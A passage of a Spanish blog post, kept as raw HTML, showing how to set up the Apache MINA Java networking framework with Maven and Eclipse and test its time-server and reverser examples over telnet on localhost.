small;">éste</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> texto que introduce al lector al tiempo que se desarrolla una aplicación de chat típica por lo cual resulta bastante entretenido. Buscando un framework para el desarrollo de aplicaciones de red en Java(porque en Java hay frameworks para todo :) ) apareció </span></span><a href="http://mina.apache.org/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Apache MINA</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">(Multipurpose Infrastucture Networked Aplications) que es un proyecto de Apache que está aun madurando pero ya existen </span></span><a href="http://mina.apache.org/related-projects.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">productos desarrollados con esta tecnología</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. Entre sus ventajas destaco las siguientes:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Es multipropósito, como dije antes solo es preciso implementar el codec para los protocolos necesarios y el coportamiento específico de la aplicación(lógica de negocio)..</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Utiliza JAVA.NIO, el nuevo framework de Java con nuevas características y mejoras en rendimiento respecto a JAVA.IO.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Gestiona eficientemente la respuesta a multiples peticiones simultáneas evitándole al programador la necesidad de gestionar de múltiples threads.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Funciona sobre TCP o UDP.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Diseñado especificamente para el fin, por ejemplo, los buffers de envío y recepción se expanden y se contraen solos(si queremos).</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Dirigido por eventos, solo hay que definir las acciones a llevar a cabo en funcion de los eventos(conexión creada, mensaje recibido ...) que se producen.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Todas las </span></span><a href="http://java.ciberaula.com/articulo/tecnologia_orientada_objetos/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ventajas</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> de los lenguajes de programación orientados a objetos(reutilización, abstracción ... )</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Vamos al tema, empezaremos por explicar los pasos necesarios para poner a andar todo esto ya que el framework es un proyecto de </span></span><a href="http://maven.apache.org/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Apache Maven</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y quiero usar Eclipse para desarrollar. El primer paso es instalar el Maven, en mi Debian: </span></span><b><code><span class="Apple-style-span" style="font-weight: normal;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">apt-get install maven2</span></span></i></span></code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. En Windows los instaladores los encontramos con </span></span><a href="http://maven.apache.org/download.html#Installation"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">éstas instrucciones</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> de instalación.</span></span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">El siguiente paso es descargar el framework de MINA, en este caso elijo </span></span><a href="http://mina.apache.org/downloads.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">la versión 2.0.0-RC1 </span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">aunque es inestable porque hay bastantes cambios respecto a la 1 en algunas de las clases y en el fururo prodrían aparecer problemas de compatibilidad en la aplicación. A continuación se descomprime y se accede a la carpeta por consola ya que no hay plugins de Maven oficial para eclipse y los que probé no me acabaron de funcionar correctamente. Accedemos hasta la carpeta mina-example por ser los proyectos de ejemplo con los que vamos a realizar las pruebas:</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></i><b><code><span class="Apple-style-span" style="font-weight: normal;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">cd mina-2.0.0-RC1/src/mina-example/</span></span></i></span></code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">y le decimos al Maven que cambie el proyecto al formato del Ecplise:</span></span></span><i><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span></i><code><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><i>mvn eclipse:eclipse</i></span></span></span></code></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S63UjoojRzI/AAAAAAAAACw/P22pzuFKHSE/s1600/figura1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" src="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S63UjoojRzI/AAAAAAAAACw/P22pzuFKHSE/s320/figura1.png" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Tarda un rato en actualizar el propio Maven(si es preciso) y descargar las dependencias del proyecto. Cuando termina ya tenemos el proyecto en formato del Eclipse así que lo importamos (</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">File/Import.../Existing Projects into Workspace</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y le damos a </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Next</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">), en la siguiente pantalla elegimos la ruta del proyecto mina-examples y marcamos la opcion de copiarlo al espacio de trabajo:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S63TiEt2-_I/AAAAAAAAACg/NZF9grCR8W4/s1600/Pantallazo+%281%29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S63TiEt2-_I/AAAAAAAAACg/NZF9grCR8W4/s320/Pantallazo+%281%29.png" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Nos aparecerá el proyecto a la izquierda en el explorardor de proyectos y vemos que hay errores, falta definir la variable </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">M2_REPO</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> con la ruta del repositorio de Maven (donde están las dependencias que descargó antes) en la configuración del Eclipse: (</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Window/Preferences/Java/Classpath Variables/New...</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">)</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">(Nota: En Linux la carpeta </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">.m2</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> está en el home del usuario y en Windows la encontramos en </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Documents and Setting/Usuario</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> en el XP y en </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Users/USUARIO</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> en el Vista/7).</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S63T25_aHbI/AAAAAAAAACo/Xm2SojvRQyU/s1600/FIGURA2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" src="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S63T25_aHbI/AAAAAAAAACo/Xm2SojvRQyU/s320/FIGURA2.png" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Se recomendará una recompilación y comprobamos que ahora sí encuentra las dependencias por lo que ya se puede ejecutar el primer ejemplo. Empezamos por el el ejemplo más sencillo, </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">org.apache.mina.example.gettingstarted.timeserver</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> es un servidor que lo único que hace cuando recibe cualquier petición es devolver la fecha y la hora del sistema. Ejecutamos la clase </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">MinaTimeServer.java</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S61JbPxs6yI/AAAAAAAAACA/ErSnyVsUzo8/s1600/FIGURA5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="300" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S61JbPxs6yI/AAAAAAAAACA/ErSnyVsUzo8/s400/FIGURA5.png" width="400" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Para comprobar que funciona nos podemos conectar con telnet al puerto 9123(sale en el código fuente de la clase en la primera línea):</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></i><code><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">telnet localhost 9123</span></span></i></code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, lo que se muestra por consola son los logs de la aplicación, porque !MINA incorpora también la gestión de logs!.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S61J4JbHoQI/AAAAAAAAACI/DM_zih034-I/s1600/FIGURA6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="210" src="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S61J4JbHoQI/AAAAAAAAACI/DM_zih034-I/s400/FIGURA6.png" width="400" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Otro ejemplo con la aplicación reverser:</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></i><code><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">telnet localhost 8080</span></span></i></code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S61ambhKlAI/AAAAAAAAACY/5GagC_aXU20/s1600/FIGURA7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="262" src="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S61ambhKlAI/AAAAAAAAACY/5GagC_aXU20/s400/FIGURA7.png" width="400" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Listo, ya tenemos MINA funcionando. En una próxima entrada intentaré resumir algunas nociones básicas para saber por donde empezar y no perdernos con tal cantidad de clases cuando todavía no escribimos una sola línea de código, pero eso sí, tenemos una implementación de una aplicación de red multipropósito con distintos ejemplos probados para poder experimentar y no empezar de 0, algunos incluso con sus correspondientes tests del </span></span><a href="http://www.junit.org/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">JUnit</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> (en el paquete </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">src/test/java</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> del proyecto). Asegurándonos además de que las clases que los componen, y por lo cual las que usaremos nosotros para nuestra aplicación, están diseñadas y probadas por los </span></span><a href="http://mina.apache.org/contributors.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">desarrolladores</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> de Apache MINA con las ventajas que ello supone.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div style="text-align: right;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-4461700285276464688?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0